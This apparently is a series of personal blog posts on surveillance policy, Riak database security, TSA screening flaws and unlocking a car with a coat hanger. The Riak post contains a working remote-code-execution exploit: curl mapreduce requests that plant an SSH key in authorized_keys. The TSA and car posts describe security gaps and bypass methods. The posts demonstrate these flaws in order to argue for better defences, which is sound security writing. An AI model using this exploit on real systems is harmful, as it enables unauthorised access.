I wish I could make more concrete policy recommendations, but in this case all I can say is “this looks troubling.” Here’s the letter I sent to my representatives today:

Dear Senator Feinstein,

In 2006, we learned that the NSA had secretly tapped all internet traffic flowing through AT&T’s San Francisco peering point. Now, the Guardian’s leaks suggest that the NSA has accrued phone and email records–some metadata, some full content–for millions of US citizens, and stored them for targeted analysis. The criteria for retention and analysis remain poorly understood.

In response to Senator Wyden’s inquiry as to whether the NSA was gathering “any type of data at all on millions or hundreds of millions of Americans,” Director Clapper answered “No,” then, “Not wittingly.” His recent letter admits this was a misleading statement at best.

We know that surveillance is rarely as clean as intended. In 2008, two NSA whistleblowers, Adrienne Kinne and David Murfee Faulk, independently reported that the NSA routinely intercepted the satellite phone conversations of American citizens in the Middle East, including military personnel and journalists. Faulk alleged that he and others in the NSA’s Fort Gordon facility often shared deeply personal phone calls with office mates.

“Hey check this out, there’s good phone sex,” Faulk quoted, “or there’s some pillow talk, pull up this call, it’s really funny, go check it out. It would be some colonel making pillow talk and we would say, ‘Wow, this was crazy’.”

Kinne alleged that the NSA intercepted hundreds of private conversations between American aid workers. “They were identified in our systems as ‘belongs to the International Red Cross’ and all these other organizations. And yet, instead of blocking these phone numbers we continued to collect on them.”

In the Guardian’s release of an unfinished report on Stellar Wind, the NSA admits that even its internal oversight of signals intelligence has been complicated by secrecy constraints:

“Second, in March 2003, the IG advised General Hayden that he should report violations of the Authorization to the President. In February of 2003, the OIG learned of PSP incidents or violations that had not been reported to overseers as required, because none had the clearance to see the report.”

Establishing the constitutionality of FISA activity appears fraught with absurd legal difficulties. In response to a FOIA request made by the Electronic Frontier Foundation, the Justice Department located an 86-page opinion of the FISA court which held that the government’s surveillance activity had been “improper or unconstitutional”–but refused to release it, because it was classified. Subsequently, the Justice Department argued that that opinion was controlled by the FISA court and could only be released through that court.

Meanwhile, the American Civil Liberties Union had asked the FISA court to release an opinion, and the FISA court instructed them to take the matter to the Justice Department instead!

Given Senators Wyden and Udall’s continued concerns over the truthfulness of the NSA’s statements to the public and to Congress; given the alarming allegations of whistleblowers; and given the history of state surveillance, I must express my concern. Much of the information we need to come to an informed decision is too classified to discuss, and what we can discuss appears inconsistent with a democracy predicated on the free exchange of ideas.

I recognize that we must balance the objective of security (and the commensurate need for secrecy) with the goals of individual liberty and public accountability. To argue in absolutes would foil any attempt to produce workable public policy.

As a citizen who believes in the US’s ideals and messy reality alike, I urge you to understand my deep apprehension about monitoring private communications, and to find on our behalf a reasoned, carefully considered set of policy decisions. Please give this matter your strong consideration; I believe it to be of fundamental importance.

Thank you for your time.

–Kyle Kingsbury

Microsoft released this little gem today, fixing a bug which allowed remote code execution on all Windows Vista, 7, and Server 2008 versions.

...allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system.

Meanwhile, in an aging supervillain's cavernous lair...

Major thanks to John Muellerleile (@jrecursive) for his help in crafting this.

Actually, don't expose pretty much any database directly to untrusted connections. You're begging for denial-of-service issues; even if the operations are semantically valid, they're running on a physical substrate with real limits.

Riak, for instance, exposes mapreduce over its HTTP API. Mapreduce is code; code which can have side effects; code which is executed on your cluster. This is an attacker's dream.

For instance, Riak reduce phases are given as a module, function name, and an argument. The reduce is called with a list, which is the output of the map phases it is aggregating. There are a lot of functions in Erlang which look like

module:fun([any, list], any_json_serializable_term).

But first things first. Let's create an object to mapreduce over.

curl -X PUT -H "content-type: text/plain" \
  http://localhost:8098/riak/everything_you_can_run/i_can_run_better --data-binary @-<<EOF
Riak is like the Beatles: listening has side effects.
EOF

Now, we'll perform a mapreduce query over this single object. Riak will execute the map function once and pass the list it returns to the reduce function. The map function, in this case, ignores the input and returns a list of numbers. Erlang also represents strings as lists of numbers. Are you thinking what I'm thinking?
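
Before we do, a quick sanity check (a Python snippet, purely for illustration): a list of character codes like the one our map function will return is, to Erlang, just a string.

# Decode the character codes the map phase will return.
# Erlang strings are lists of integers, so this list *is* "/tmp/evil.erl".
codes = [47, 116, 109, 112, 47, 101, 118, 105, 108, 46, 101, 114, 108]
print("".join(chr(c) for c in codes))  # => /tmp/evil.erl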

curl -X POST -H "content-type: application/json" \
  http://databevy.com:8098/mapred --data @-<<\EOF
{"inputs": [
   ["everything_you_can_run", "i_can_run_better"]
 ],
 "query": [
   {"map": {
     "language": "javascript",
     "source": "
       function(v) {
         // /tmp/evil.erl
         return [47,116,109,112,47,101,118,105,108,46,101,114,108];
       }
     "
   }},
   {"reduce": {
     "language": "erlang",
     "module": "file",
     "function": "write_file",
     "arg": "
       SSHDir = os:getenv(\"HOME\") ++ \"/.ssh/\".\n
       SSH = SSHDir ++ \"authorized_keys\".\n
       filelib:ensure_dir(os:getenv(\"HOME\") ++ \"/.ssh/\").\n
       file:write_file(SSH, <<\"ssh-rsa SOME_PUBLIC_SSH_KEY= Fibonacci\\n\">>).\n
       file:change_mode(SSHDir, 8#700).\n
       file:change_mode(SSH, 8#600).\n
       file:delete(\"/tmp/evil.erl\").
     "
   }}
 ]
}
EOF

See it? Riak takes the lists returned by all the map phases (/tmp/evil.erl), and calls the Erlang function file:write_file("/tmp/evil.erl", Arg). Arg is our payload, passed in the reduce phase's argument. That binary string gets written to disk in /tmp.

The payload can do anything. It can patch the VM silently to steal or corrupt data. Crash the system. Steal the cookie and give you a remote Erlang shell. Make system calls. It can do this across all machines in the cluster. Here, we take advantage of the fact that the riak user usually has a login shell enabled, and add an entry to .ssh/authorized_keys.

Now we can use the same trick with another 2-arity function to eval that payload in the Erlang VM.

curl -X POST -H "content-type: application/json" \
  http://databevy.com:8098/mapred --data @-<<\EOF
{"inputs": [
   ["everything_you_can_run", "i_can_run_better"]
 ],
 "query": [
   {"map": {
     "language": "javascript",
     "source": "
       function(v) {
         return [47,116,109,112,47,101,118,105,108,46,101,114,108];
       }
     "
   }},
   {"reduce": {
     "language": "erlang",
     "module": "file",
     "function": "path_eval",
     "arg": "/tmp/evil.erl"
   }}
 ]
}
EOF

Astute readers may recall path_eval ignores its first argument if the second is a file, making the value of the map phase redundant here.

You can now ssh to riak@some_host using the corresponding private key. The payload /tmp/evil.erl removes itself as soon as it's executed, for good measure.

This technique works reliably on single-node clusters, but could be trivially extended to work on any number of nodes. It also doesn't need to touch the disk; you can abuse the scanner/parser to eval strings directly, though it's a more convoluted road. You might also abuse the JS VM to escape the sandbox without any Erlang at all.

In summary: don't expose a database directly to attackers, unless it's been designed from the ground up to deal with multiple tenants, sandboxing, and resource allocation. These are hard problems to solve in a distributed system; it will be some time before robust solutions are available. Meanwhile, protect your database with a layer which allows only known safe operations, and performs the appropriate rate/payload sanity checking.
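
To make that concrete, a gatekeeping layer can be as simple as a default-deny whitelist plus coarse payload and rate checks. Here's a minimal Python sketch; the allowed operations and limits are assumptions you'd tailor to your own application, not anything Riak provides:

# A minimal sketch of a gatekeeping layer: default-deny, explicit whitelist,
# and crude payload/rate sanity checks. Names and limits are illustrative.
ALLOWED = {("GET", "riak"), ("PUT", "riak")}   # no /mapred, no link-walking
MAX_BODY_BYTES = 1024 * 1024                   # 1 MB cap on payloads

def allow(method, path, body, requests_last_second):
    prefix = path.split("/")[1] if "/" in path else ""
    if (method, prefix) not in ALLOWED:
        return False                            # unknown operations are denied
    if len(body) > MAX_BODY_BYTES:
        return False                            # oversized payloads are denied
    if requests_last_second > 50:
        return False                            # crude rate limiting
    return True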

The riak-users list receives regular questions about how to secure a Riak cluster. This is an overview of the security problem, and some general techniques to approach it.

Theory

You can skip this, but it may be a helpful primer.

Consider an application composed of agents (Alice, Bob) and a datastore (Store). All events in the system can be parameterized by time, position (whether the event took place in Alice, Bob, or Store), and the change in state. Of course, these events do not occur arbitrarily; they are connected by causal links (wires, protocols, code, etc.)

If Alice downloads a piece of information from the Store, the two events E (Store sends information to Alice) and F (Alice receives information from store) are causally connected by the edge EF. The combination of state events with causal connections between them comprises a directed acyclic graph.

A secure system can be characterized as one in which only certain events and edges are allowed. For example, only after a nuclear war can persons on boats fire ze missiles.

A system is secure if all possible events and edges fall within the allowed set. If you're a weirdo math person you might be getting excited about line graphs and dual spaces and possibly lightcones but... let's bring this back to earth.

Authentication vs Authorization

Authentication is the process of establishing where these events are taking place, in system space. Is the person or agent on the other end of the TCP socket really Alice? Or is it her nefarious twin? Is it the Iranian government?

Authorization is the problem of deciding what edges are allowed. Can Alice download a particular file? Can Bob mark himself as a publisher?

You can usually solve these problems independently of one another.

Asymmetric cryptography combined with PKI allows you to trust big entities, like banks with SSL certificates. Usernames with expensively hashed, salted passwords can verify the repeated identity of a user to a low degree of trust. OAuth providers (like Facebook and Twitter) and OpenID offer other approaches to web authentication. You can combine these methods with stronger systems, like RSA secure tokens, challenge-response over a second channel (like texting a code to the user's cell phone), or one-time passwords for higher guarantees.
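
As a concrete example of the password piece, expensive salted hashing might look like this (a Python sketch using the bcrypt library; the cost factor of 12 is an arbitrary choice you'd tune):

import bcrypt

# Store only the salted, expensively hashed password, never the plaintext.
hashed = bcrypt.hashpw(b"correct horse battery staple", bcrypt.gensalt(rounds=12))

# Later, verify a login attempt by hashing the candidate with the same salt.
def authenticate(candidate, stored_hash):
    return bcrypt.checkpw(candidate, stored_hash)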

Authorization tends to be expressed (more or less formally) in code. Sometimes it's called a policy engine. It includes rules saying things like "Anybody can download public files", "a given user can read their own messages", and "only sysadmins can access debugging information".
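
In its simplest form, a policy engine is just a default-deny function over (agent, action, resource). A toy Python sketch, with made-up roles and actions along the lines of the rules above:

# Everything not explicitly allowed is denied.
def authorized(user, action, resource):
    if action == "download" and resource.get("public"):
        return True                                  # anybody can download public files
    if action == "read" and resource.get("owner") == user.get("id"):
        return True                                  # users can read their own messages
    if action == "debug" and "sysadmin" in user.get("roles", []):
        return True                                  # only sysadmins get debug info
    return False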

Strategies

There are a couple of common ways that security can fail. Sometimes the system, as designed, allows insecure operations. Perhaps a check for user identity is skipped when accessing a certain type of record, letting users view each other's paychecks. Other times the abstraction fails; the SSL channel you presumed to be reliable was tapped, allowing information to flow to an eavesdropper, or the language runtime allows payloads from the network to be executed as code. Thus, even if your model (for instance, application code) is provably correct, it may not be fully secure.

As with all abstractions on unreliable substrates, any guarantees you can make are probabilistic in nature. Your job is to provide reasonable guarantees without overwhelming cost (in money, time, or complexity). And these problems are hard.

There are some overall strategies you can use to mitigate these risks. One of them is known as defense in depth. You use overlapping systems which prevent insecure things from happening at more than one layer. A firewall prevents network packets from hitting an internal system, but it's reinforced by an SSL certificate validation that verifies the identity of connections at the transport layer.

You can also simplify building secure systems by choosing to whitelist approved actions, as opposed to blacklisting bad ones. Instead of selecting evil events and causal links (like Alice stealing sensitive data), you enumerate the (typically much smaller) set of correct events and edges, deny all actions, then design your system to explicitly allow the good ones.

Re-use existing primitives. Standard cryptosystems and protocols exist for preventing messages from being intercepted, validating the identity of another party, verifying that a message has not been tampered with or corrupted, and exchanging sensitive information. A lot of hard work went into designing these systems; please use them.

Create layers. Your system will frequently mediate between an internal high-trust subsystem (like a database) and an untrusted set of events (e.g. the internet). Between them you can introduce a variety of layers, each of which can make stricter guarantees about the safety of the edges between events. In the case of a web service:

  1. TCP/IP can make a reasonable guarantee that a stream is not corrupted.
  2. The SSL terminator can guarantee (to a good degree) that the stream of bytes you've received has not been intercepted or tampered with.
  3. The HTTP stack on top of it can validate that the stream represents a valid HTTP request.
  4. Your validation layer can verify that the parameters involved are of the correct type and size.
  5. An authentication layer can prove that the originating request came from a certain agent.
  6. An authorization layer can check that the operation requested by that person is allowed.
  7. An application layer can validate that the request is semantically valid--that it doesn't write a check for a negative amount, or overflow an internal buffer.
  8. The operation begins.
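
One way to picture this stack is as a chain of checks, where a request is rejected by the first layer it fails. A minimal Python sketch with stand-in checks (the real layers would be far richer):

# Each check returns None on success, or a reason for rejection.
# These are trivial stand-ins for the layers described above.
def valid_http(req):    return None if "method" in req and "path" in req else "malformed request"
def valid_params(req):  return None if len(req.get("body", "")) <= 65536 else "body too large"
def authenticated(req): return None if req.get("user") else "unauthenticated"
def authorized(req):    return None if req.get("user") == req.get("owner") else "forbidden"

LAYERS = [valid_http, valid_params, authenticated, authorized]

def handle(req):
    for check in LAYERS:
        reason = check(req)
        if reason:
            return {"status": 400, "error": reason}  # reject at the first failing layer
    return {"status": 200, "body": "ok"}             # every layer passed; do the work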

Minimize trust between discrete systems. Don't relay sensitive information over channels that are insecure. Force other components to perform their own authentication/authorization to obtain sensitive data.

Minimize the surface area for attack. Write less code, and provide fewer ways to interact with the system. The fewer pathways are available, the easier they are to reinforce.

Finally, it's worth writing evil tests to experimentally verify the correctness of your system. Start with the obvious cases and proceed to harder ones. As the complexity grows, probabilistic methods like Quickcheck or fuzz testing can be useful.
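
For instance, an "evil test" in the property-based style might feed arbitrary bytes to your request parser and assert that garbage never comes out looking authenticated. A Python sketch using the hypothesis library; parse_request here is a toy stand-in for your own parsing layer:

from hypothesis import given, strategies as st

# Stand-in for a real parser: accepts bytes, returns a dict or raises ValueError.
def parse_request(data):
    if not data.startswith(b"GET "):
        raise ValueError("not a request")
    return {"method": "GET", "authenticated": False}

@given(st.binary())
def test_garbage_never_authenticates(data):
    # Arbitrary bytes must either be rejected outright or come back unauthenticated.
    try:
        request = parse_request(data)
    except ValueError:
        return
    assert request["authenticated"] is False

if __name__ == "__main__":
    test_garbage_never_authenticates()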

Databases

Remember those layers of security? Your datastore resides at the very center of that. In any application which has shared state, your most trusted, validated, safe data is what goes into the persistence layer. The datastore is the most trusted component. A secure system isolates that trusted zone with layers of intermediary security connecting it to the outside world.

Those layers perform the critical task of validating edges between database events (e.g. store Alice's changes to her user record) and the world at large (e.g. Alice submits a user update). If your security model is completely open, you can expose the database directly to the internet. Otherwise, you need code to ensure these actions are OK.

The database can do some computation. It is, after all, software. Therefore it can validate some actions. However, the datastore can only discriminate between actions at the level of its abstraction. That can severely limit its potential.

For instance, all datastores can choose to allow or deny connections. However, only relational stores can allow or deny actions on the basis of the existence of related records, as with foreign key constraints. Only column-oriented stores can validate actions on the basis of columns, and so forth.

Your security model probably has rules like "Only allow HR employees to read other employees' salaries" and "Only let IT remove servers". These constructs, "HR employees", "Salaries", "IT", "remove", and "servers" may not map to the datastore's abstraction. In a key-value store, "remove" can mean "write a copy of a JSON document without a certain entry present". The key-value store is blind to the contents of the value, and hence cannot enforce any security policies which depend on it.
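
To make the abstraction gap concrete: in a key-value store, "removing a salary" is just a read-modify-write of an opaque value. A Python sketch (the document shape is invented):

import json

# What the application sees: structured data the security policy cares about.
stored = '{"name": "Alice", "role": "engineer", "salary": 100000}'

# What "remove the salary" means to a key-value store: overwrite one opaque
# value with another. The store never knows a "salary" field existed, so it
# cannot decide who may read or remove it.
doc = json.loads(stored)
doc.pop("salary", None)
new_value = json.dumps(doc)
print(new_value)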

In almost every case, your security model will not be embeddable within the datastore, and the datastore cannot enforce it for you. You will need to apply the security model at least partially at a higher level.

Doing this is easy.

Allow only trusted hosts to initiate connections to the database, using firewall rulesets. Usernames and passwords for database connections typically provide little additional security, as they're stored in dozens of places across the production environment. Relying on these credentials or any authorization policy linked to them (e.g. SQL GRANT) is worthless when you assume your host, or even client software, has been compromised. The attacker will simply read these credentials from disk or off the wire, or exploit active connections in software.

On trusted hosts, between the datastore and the outside world, write the application which enforces your security model. Separate layers into separate processes and separate hosts, where reasonable. Finally, untrusted hosts connect these layers to the internet. You can have as many or as few layers as you like, depending on how strongly you need to guarantee isolation and security.

Putting it all together

Let's sell storage in Riak to people, over the web. We'll present the same API as Riak, over HTTP.

Here's a security model: Only traffic from users with accounts is allowed. Users can only read and write data from their respective buckets, which are transparently assigned on write. Also, users should only be able to issue x requests/second, to prevent them from interfering with other users on the cluster.
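
The rate-limiting requirement, for example, could be handled with a token bucket per user. A Python sketch with made-up limits; in a real deployment the counters would live in shared storage rather than in one process:

import time

class TokenBucket:
    """Allow up to `rate` requests per second, with bursts up to `capacity`."""
    def __init__(self, rate=10.0, capacity=20.0):
        self.rate = rate
        self.capacity = capacity
        self.tokens = capacity
        self.last = time.monotonic()

    def allow(self):
        now = time.monotonic()
        # Refill in proportion to elapsed time, then spend one token if we can.
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False

buckets = {}  # one bucket per authenticated user

def check_rate(user_id):
    bucket = buckets.setdefault(user_id, TokenBucket())
    return bucket.allow()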

We're going to presuppose the existence of an account service (perhaps Riak, mysql, whatever) which stores account information, and a bucket service that registers buckets to users.

  1. Internet. Users connect over HTTPS to an application node.
  2. The HTTPS server's SSL acceptor decrypts the message and ensures transport validity.
  3. The HTTP server validates that the request is in fact valid HTTP.
  4. The authentication layer examines the HTTP AUTH headers for a valid username and password, comparing them to bcrypt-hashed values on the account service.
  5. The rate limiter checks that this user has not made too many requests recently, and updates the request rate in the account service.
  6. The Riak validator checks to make sure that the request is a well-formed request to Riak; that it has the appropriate URL structure, accept header, vclock, etc. It constructs a new HTTP request to forward on to Riak.
  7. The bucket validator checks with the bucket service to see if the bucket to be used is taken. If it is, it verifies that the current authenticated user matches the bucket owner. If it isn't, it registers the bucket.
  8. The application node relays the request over the network to a Riak node.
  9. Riak nodes are allowed by the firewall to talk only to application nodes. The Riak node executes the request and returns a response.
  10. The response is immediately returned to the client.

Naturally, this only works for certain operations. Mapreduce, for instance, executes code in Riak. Exposing it to the internet is asking for trouble. That's why we need a Riak validation layer to ensure the request is acceptable; it can allow only puts and gets.

Happy hacking

I hope this gives you some idea of how to architect secure applications. Apologies for the shoddy editing--I don't have time for a second pass right now and wanted to get this out the door. Questions and suggestions in the comments, please! :-)

Hello, law enforcement. I suspect you're reading this because, as a TSA supervisor told me recently, "... we are interested in you".

Yes, I asked to fly selectee--to not provide ID--at Denver International recently. Yes, I've done this before. Yes, there was a lot of confusion between TSA employees on whether that was legal or not--eventually M. Gatling of the DIA police told me I was required to display ID. Yes, I opted out of AIT. Yes, it did take no fewer than eight TSA officers, airline representatives, and police about 45 minutes to determine I posed no threat. Yes, I was exceedingly polite, and most of us got along quite well. Yes, I was asked all kinds of questions I was under no obligation to answer (among them my address and phone number), and no, the TSA supervisor was not very pleased that I asked whether I was legally required to respond.

"What is your contact number."

"Am I legally required to give that information?"

"I'm asking you."

"Well, that much is clear."

"What is your contact number."

"Am I required to tell you?"

"I'm asking."

...

To cut to the chase: no, I am not a terrorist. No, I have no interest in harming anyone. Quite the opposite, in fact. If you're interested in why I disagree with the screening system, my reasoning is simple; the screening process is not sufficient to detect probable threats, yet incurs disproportionate social and monetary costs.

The costs are obvious: long wait times, missed flights, lost items, and depending on your personal views, dignity. Some people are not okay, for a variety of powerful reasons, with having their body touched everywhere. The question is, are these costs proportionate and acceptable given the process' effect on the probability distribution of bad events--i.e., to what extent it prevents people from crashing planes into buildings.

I believe the answer is no. The TSA's strategy for passenger screening has been primarily reactive, not anticipatory. The organization simply doesn't think ahead to consider probable threats. Consider that we only started to remove shoes for screening after Richard Reid's attempt to light his shoes on fire in 2001. Similarly, we only began limiting liquids after the 2006 UK bombing plot. Toner cartridges? Same story.

The problem is not necessarily that these systems fail to prevent the attacks they are designed to combat--it's that they do not address other, previously unexploited avenues of attack. The specific failures in these systems include:

  1. The pat-down is insufficiently aggressive. I've opted out of AIT several times and received their pat-down. They don't reach between the buttocks, nor do they check behind the scrotum. I'm a relatively trim person. Someone with significant body fat could likely conceal a reasonably sized weapon in this area and avoid detection. The only explanation I can conceive of is that the TSA has modified their pat-down to prevent public exasperation. You have to lift and separate. Sorry guys.

  2. X-ray screeners fail to notice restricted items, let alone real threats. I know dozens of people who have accidentally carried scissors, nails, knives, and large volumes of liquid onto planes. Moreover, the TSA admits that it has difficulty detecting partial explosive devices. Screeners routinely fail bomb drills.

  3. Metal detectors are still the principal line of defense at many airports. They fail to detect ceramic and glass weapons. You can pick up quite nasty ceramic blades at any cooking store. For that matter, metal detectors also can't detect several types of weakly paramagnetic metals, like titanium.

  4. Terahertz radiation has a 90% penetration depth of a few centimeters at best. That means it can't detect objects concealed in body cavities, or, for that matter, implanted objects.

  5. Even backscatter x-rays with a significant penetrating distance won't be able to distinguish between medical implants and weapons--as the new software only reports anomalies for physical screening.

In addition, there are two systemic problems making threat prevention difficult:

  1. Because passengers are not forced to undergo screening during transfers, the safety of the entire US air system is limited to that of the weakest connecting airport.

  2. Because not all screening methods are applied to every passenger, and because the methods used can be deterministically altered by passenger action (e.g. refusing AIT screening, choosing to enter security during high load times, selecting which airport to enter), large threat classes that could be prevented can go unnoticed.

Even if all screening methods were used in concert at all airports, internal weakly-magnetic weapons would still go undetected. Yeah, it sounds crazy; but we're talking about people willing to kill themselves on planes. Who does that? Even if we hadn't prevented any of the publicly reported terrorist attacks in the last ten years, you'd be more likely by an order of magnitude to die as a result of mechanical failure or pilot error than by terrorism!

I probably shouldn't mention that queueing hundreds to thousands of people in small spaces before screening probably isn't the safest way to do things, either.

Moreover, there are several types of legitimate objects which cannot be reasonably screened. Motorized wheelchairs, for example, can contain a hundred amp-hours at 12 volts (1,200 watt-hours), or about 4.32 * 10^6 joules. That's about as much energy as a kilogram of TNT.

On top of all this, security personnel, pilots, and cargo aren't held to anywhere near the same level of screening. The TSA, however, seems more concerned with suppressing criticism than actually preventing attacks. Our reaction to whistleblowers like Robert Cravens, who reported hundreds of pounds of flammable materials being stored improperly, or Chris Liu, who posted a video of airport security failures to YouTube, has been, well, less than congratulatory. As their Human Resources department says, "because it is illegal to retaliate at the TSA there is no need to maintain an office for complaints."

The funny thing is that these objections are obvious. I'm sure there are entire teams of people in the DHS and elsewhere fighting to improve the safety of flights, and that they are raising exactly these concerns. I can only conclude that their efforts have been buried by bureaucracy or dismissed due to conflicting ideologies.

I'm not trying to say we should do away with airport security. I'm saying that if we're going to spend $8.1 billion annually, we might focus on more likely threats. We simply cannot prevent sufficiently determined attackers from killing people on planes. What we should do is focus on in-depth, comprehensive risk management.

That means taking a page from Israel's book, where terrorist attacks actually happen on a regular basis. It means asking people questions, watching their behavior carefully, and other types of soft assessment. It means making it difficult to actually hijack the plane: reinforced cockpit doors, failsafe flight controls, and rapid scrambling of fighters. It means continuing to increase the presence of air marshals. We've made great progress in implementing these layers of security.

In fact, given that modern passenger aircraft are basically capable of taking off, flying, and landing completely under computer control, it seems entirely feasible (and indeed, I would be shocked if nobody were currently developing this) to make planes which simply cannot be hijacked or crashed into structures. At the first sign of hijacking, both pilot and copilot sign off on a failsafe landing mode. The plane does not permit manual override of its controls, finds the nearest airport, and touches down. A more passive layer of this software could simply prevent the aircraft from entering a flight corridor which could lead to collision with a major metropolitan area. Even if these safety modes are ten times more likely to cause crashes than manual control, it's an improvement over the likely outcome of hijacking--and completely eliminates the hostage value of the passengers. There would simply be no incentive to commandeer a plane.

It also means spending more money on good screeners, and training them to recognize more than the demo bombs on their screens. It means establishing stronger cultural and physical constraints on trusted employees, and raising the bar on background checks.

We can also mitigate threats through cultural systems. After 9/11, passengers are aware that they have significant impact on the outcome of a hijacking. We should encourage people to yell when their neighbors light their shoes on fire, and tackle them if they try to pull a weapon. It's an experimentally proven and cheap way to prevent deaths.

In summary, the present TSA process fails to address a variety of realistic threats while placing undue focus on the specific attack modes we've already seen, at significant cost to the public. I disagree with this process, and opt out.

Carrie (one of my summer housemates) locked herself out of her car earlier this week. She gave Justin and me a call, asking us to contact a local locksmith. Rather than go to the expense of calling a locksmith after hours, we offered to try to break in first.

I'd never tried, or really thought about, breaking into a car before. I don't drive my car very often, and I don't tend to leave my keys behind, so it had never really occurred to me that I might need to know how, but here was a chance to find out. We stopped by the house, picked up a wire coat hanger and a pair of wire cutters, and drove out to the store she had parked in front of. "Thank goodness you're here," she exclaimed, and showed us her key-containing purse, neatly tucked away on the back seat.

I unbent the coat hanger and snipped off the twisted end. The door locks were the pull-type, small vertical posts that, in their locked state, remained safely recessed within the door body. There was no chance of extracting them from above, barring the use of strong adhesives, but I imagined that it might be possible to catch whatever locking mechanism connected those posts to the door lock by inserting a hooked wire into the door body at the midline window seal. Then Carrie offered that she had power locks.

"Oh!" We stood up to examine the door body from the top of the passenger-side window. Indeed, a three-way rocker button was situated, out of passing view, in the door's armrest. Even better, the button faced up--it would only be necessary to depress it to open the lock. I inserted the coat hanger into the weatherstripping at the top of the door, where it met the metal just above the window. It slid easily through and down to the seat, but I couldn't direct it back towards the door frame. Removing the wire and making a quick bend rectified that situation, and I pressed the button easily.

All in all, the process took about 3 minutes and caused no visible damage. Now that I know what to do and where to look, I could unlock a similar vehicle in perhaps as little as 15 seconds. Whoah! I always thought it would take a lot of time to break into a car--at least five minutes--so somebody would notice what you were doing. Or if you did it fast, you'd need to break a window or do something else noticeably violent. Yet this was fast, easy, and nobody asked us any questions. It would be harder to steal a bicycle. Suffice it to say, I'm not trusting my valuables to any car that might be a target from now on.

With that experience in mind, here's what I plan to look for (or modify) when I buy a new car. (If you are a car designer, please take note!)

Doors
  1. I haven't tested any other vehicles, but some cars may not let you insert a coat hanger through the door at all. Try the weatherstripping at the glass, at the metal, and at the door gap.
Physical locking mechanisms
  1. Physical locks should offer as little mechanical purchase as possible. The post-type is hard to open with this method because it is smooth and has no corners to pull on.
  2. Locks should take some force to open. It's hard to apply a lot of force through a wire, except when pulling forward or upward.
  3. If the lock offers something to pull on, it should not pull up or forward. In to and away from the door are the hardest directions to manipulate with something going through the weatherstripping.
  4. A physical lock should be hard to see from outside the vehicle. That makes it more difficult to aim attempts to open it.
Power locks
  1. If the vehicle has power locks, under no circumstances should they offer buttons that press down! Pushing in towards the door or pulling out towards the chair is probably the safest.
  2. If there are buttons, they most definitely should not be concave! This particular switch had a convex lock and a concave unlock surface: merely touching the lock directs the wire right on target. A convex surface is harder to press, but likely not impossible.

Of course, no vehicle is immune to lock-picking or POWS (plain-old-window-smashing), so your best bet is always to bring your valuable items with you, and keep any existing items hidden. If your car isn't as much of a target, it dramatically enhances the ability of your security measures to do their job. :-)

Stay safe!
